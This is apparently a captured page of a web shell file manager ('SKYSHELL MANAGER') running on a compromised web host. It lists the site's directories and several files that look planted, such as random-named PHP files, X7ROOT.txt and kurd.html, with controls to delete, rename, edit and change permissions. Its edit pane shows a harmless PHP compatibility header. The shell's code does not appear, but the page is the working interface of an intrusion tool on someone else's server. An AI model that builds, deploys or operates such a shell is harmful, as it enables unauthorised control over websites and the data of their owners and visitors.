📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.38 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: php3_compat.h
/* +----------------------------------------------------------------------+ | PHP Version 5 | +----------------------------------------------------------------------+ | Copyright (c) 1997-2013 The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Author: | +----------------------------------------------------------------------+ */ /* $Id$ */ #ifndef PHP3_COMPAT_H #define PHP3_COMPAT_H typedef zval pval; #define pval_copy_constructor zval_copy_ctor #define pval_destructor zval_dtor #define _php3_hash_init zend_hash_init #define _php3_hash_destroy zend_hash_destroy #define _php3_hash_clean zend_hash_clean #define _php3_hash_add_or_update zend_hash_add_or_update #define _php3_hash_add zend_hash_add #define _php3_hash_update zend_hash_update #define _php3_hash_quick_add_or_update zend_hash_quick_add_or_update #define _php3_hash_quick_add zend_hash_quick_add #define _php3_hash_quick_update zend_hash_quick_update #define _php3_hash_index_update_or_next_insert zend_hash_index_update_or_next_insert #define _php3_hash_index_update zend_hash_index_update #define _php3_hash_next_index_insert zend_hash_next_index_insert #define _php3_hash_pointer_update zend_hash_pointer_update #define _php3_hash_pointer_index_update_or_next_insert zend_hash_pointer_index_update_or_next_insert #define _php3_hash_pointer_index_update zend_hash_pointer_index_update #define _php3_hash_next_index_pointer_update zend_hash_next_index_pointer_update #define _php3_hash_next_index_pointer_insert zend_hash_next_index_pointer_insert #define _php3_hash_del_key_or_index zend_hash_del_key_or_index #define _php3_hash_del zend_hash_del #define _php3_hash_index_del zend_hash_index_del #define _php3_hash_find zend_hash_find #define _php3_hash_quick_find zend_hash_quick_find #define _php3_hash_index_find zend_hash_index_find #define _php3_hash_exists zend_hash_exists #define _php3_hash_index_exists zend_hash_index_exists #define _php3_hash_is_pointer zend_hash_is_pointer #define _php3_hash_index_is_pointer zend_hash_index_is_pointer #define _php3_hash_next_free_element zend_hash_next_free_element #define _php3_hash_move_forward zend_hash_move_forward #define _php3_hash_move_backwards zend_hash_move_backwards #define _php3_hash_get_current_key zend_hash_get_current_key #define _php3_hash_get_current_data zend_hash_get_current_data #define _php3_hash_internal_pointer_reset zend_hash_internal_pointer_reset #define _php3_hash_internal_pointer_end zend_hash_internal_pointer_end #define _php3_hash_copy zend_hash_copy #define _php3_hash_merge zend_hash_merge #define _php3_hash_sort zend_hash_sort #define _php3_hash_minmax zend_hash_minmax #define _php3_hash_num_elements zend_hash_num_elements #define _php3_hash_apply zend_hash_apply #define _php3_hash_apply_with_argument zend_hash_apply_with_argument #define php3_error php_error #define php3_printf php_printf #define _php3_sprintf php_sprintf #define php3_module_entry zend_module_entry #define php3_strndup zend_strndup #define php3_str_tolower zend_str_tolower #define php3_binary_strcmp zend_binary_strcmp #define php3_list_insert zend_list_insert #define php3_list_find zend_list_find #define php3_list_delete zend_list_delete #define php3_plist_insert zend_plist_insert #define php3_plist_find zend_plist_find #define php3_plist_delete zend_plist_delete #define zend_print_pval zend_print_zval #define zend_print_pval_r zend_print_zval_r #define function_entry zend_function_entry #define _php3_addslashes php_addslashes #define _php3_stripslashes php_stripslashes #define php3_dl php_dl #define getParameters zend_get_parameters #define getParametersArray zend_get_parameters_array #define list_entry zend_rsrc_list_entry #endif /* PHP3_COMPAT_H */
Save